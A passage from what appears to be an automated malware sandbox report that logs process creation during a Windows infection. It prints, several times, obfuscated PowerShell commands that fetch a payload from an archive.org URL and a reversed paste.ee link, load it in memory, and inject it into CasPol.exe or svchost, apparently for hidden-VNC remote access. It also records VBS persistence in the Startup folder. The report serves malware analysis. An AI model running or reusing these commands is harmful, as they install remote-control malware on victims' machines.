WV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: unknown |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\hvnc.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\conhost.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\conhost.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: unknown |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10 |
|
Source: unknown |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_32.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: unknown |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_pow.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10 |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" |
|
Source: C:\Windows\System32\wscript.exe |
